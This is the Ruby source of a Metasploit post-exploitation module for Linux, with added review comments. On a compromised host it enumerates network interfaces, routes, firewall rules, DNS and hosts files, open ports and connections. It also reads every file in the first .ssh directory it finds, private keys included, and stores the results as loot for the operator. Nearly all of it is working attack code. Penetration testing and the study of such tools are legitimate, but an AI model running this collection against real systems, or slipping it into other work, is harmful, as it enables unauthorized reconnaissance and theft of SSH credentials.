rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/linux/gather/enum_network.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
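class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System

  # Registers the module metadata (name, description, authors, platform and
  # supported session types) by merging it into the caller-supplied info hash.
  #
  # @param info [Hash] metadata passed in by the caller, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux Gather Network Information',
        'Description' => %q{
          This module gathers network information from the target system
          IPTables rules, interfaces, wireless information, open and listening
          ports, active network connections, DNS information and SSH information.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'ohdae <bindshell[at]live.com>', # minor additions, modifications & testing
          'Stephen Haywood <averagesecurityguy[at]gmail.com>', # enum_linux
        ],
        'Platform' => ['linux'],
        'SessionTypes' => ['shell', 'meterpreter'],
        # NOTE(review): 'SideEffects' is declared empty although #run issues a
        # series of commands on the session host; confirm this matches the
        # framework's side-effect definitions.
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Entry point used when the operator issues `run`.
  #
  # Prints the session host and the user the commands run as, then issues a
  # fixed set of commands and file reads and hands each result to #save.
  # The literal command strings and file paths below are the ones sent to the
  # session, so they double as the list of host-side activity this module
  # generates (each command wrapped by #execute gains an `|| echo <token>`
  # suffix).
  def run
    print_status("Running module against #{get_hostname} (#{session.session_host})")

    # execute returns nil on failure; interpolation then prints an empty name.
    user = execute('/usr/bin/whoami')
    print_status("Module running as #{user}")

    # Collect data
    distro = get_sysinfo
    print_good('Info:')
    print_good("\t#{distro[:version]}")
    print_good("\t#{distro[:kernel]}")

    print_status('Collecting data...')

    nconfig = execute('/sbin/ifconfig -a')
    routes = execute('/sbin/route -e')
    iptables = execute('/sbin/iptables -L')
    iptables_nat = execute('/sbin/iptables -L -t nat')
    iptables_man = execute('/sbin/iptables -L -t mangle')
    resolv = cat_file('/etc/resolv.conf')
    sshd_conf = cat_file('/etc/ssh/sshd_config')
    hosts = cat_file('/etc/hosts')
    connections = execute('/usr/bin/lsof -nPi')
    wireless = execute('/sbin/iwconfig')
    open_ports = execute('/bin/netstat -tulpn')
    updown = execute('ls -R /etc/network')

    ssh_keys = get_ssh_keys

    # Save Enumerated data
    save('Network config', nconfig)
    save('Route table', routes)
    # to_s turns a failed (nil) table listing into '' so the three can be joined.
    save('Firewall config', iptables.to_s + iptables_nat.to_s + iptables_man.to_s)
    save('DNS config', resolv)
    save('SSHD config', sshd_conf)
    save('Host file', hosts)
    # NOTE(review): ssh_keys is an Array while every other payload is a String;
    # confirm store_loot serialises an Array the way the operator expects.
    save('SSH keys', ssh_keys) unless ssh_keys.empty?
    save('Active connections', connections)
    save('Wireless information', wireless)
    save('Listening ports', open_ports)
    save('If-Up/If-Down', updown)
  end

  # Stores one collected item as loot of type 'linux.enum.network'.
  #
  # Nil, false or empty data is reported with print_bad and not stored.
  #
  # @param msg [String] label used in the status lines and passed to store_loot
  # @param data [String, Array, nil] collected content
  # @param ctype [String] content type handed to store_loot
  def save(msg, data, ctype = 'text/plain')
    if !data || data.empty?
      print_bad("Unable to get data for #{msg}")
      return
    end

    ltype = 'linux.enum.network'
    loot = store_loot(ltype, ctype, session, data, nil, msg)
    print_good("#{msg} stored in #{loot}")
  end

  # Runs a command on the session and returns its output, or nil on failure.
  #
  # The command is sent as `cmd || echo <token>`, where the token is a random
  # 8-letter string. The remote shell only echoes the token when the command
  # exits non-zero, so finding it in the output is treated as failure. Any
  # partial output printed before the token is discarded along with it.
  #
  # @param cmd [String] command line to run
  # @return [String, nil] command output, or nil when the token was echoed
  def execute(cmd)
    verification_token = Rex::Text.rand_text_alpha(8)
    vprint_status("Execute: #{cmd}")
    output = cmd_exec(cmd + " || echo #{verification_token}")
    return nil if output.include?(verification_token)

    output
  end

  # Reads a file from the session host through read_file.
  #
  # @param filename [String] path on the session host
  # @return whatever read_file returns for that path
  def cat_file(filename)
    vprint_status("Download: #{filename}")
    read_file(filename)
  end

  # Reads every entry of the first `.ssh` directory found within three levels
  # of `/`.
  #
  # Only the first matching directory is processed. Despite the method name,
  # all entries other than `.`-only names are read, not just key files.
  #
  # @return [Array] contents of each entry as returned by cat_file; empty when
  #   no directory is found or its listing fails
  def get_ssh_keys
    # Look for .ssh folder, "~/" might not work everytime
    vprint_status('Execute: /usr/bin/find / -maxdepth 3 -name .ssh')
    dirs = cmd_exec('/usr/bin/find / -maxdepth 3 -name .ssh').split("\n")
    ssh_base = dirs.find { |d| d =~ %r{(^/)(.*)\.ssh$} }

    # We didn't find .ssh :-(
    return [] unless ssh_base

    # List all the files under .ssh/
    # NOTE(review): ssh_base is interpolated unquoted, so a directory name
    # containing whitespace would be split by the remote shell.
    listing = execute("/bin/ls -a #{ssh_base}")

    # Fix: execute returns nil when the listing fails; the original called
    # .chomp on that nil and raised NoMethodError, aborting #run before any
    # of the already collected data was saved.
    return [] unless listing

    # split with no argument breaks on any whitespace, so a file name that
    # contains a space is treated as several entries.
    listing.chomp.split.each_with_object([]) do |k, keys|
      next if k =~ /^(\.+)$/

      keys << cat_file("#{ssh_base}/#{k}")
    end
  end
end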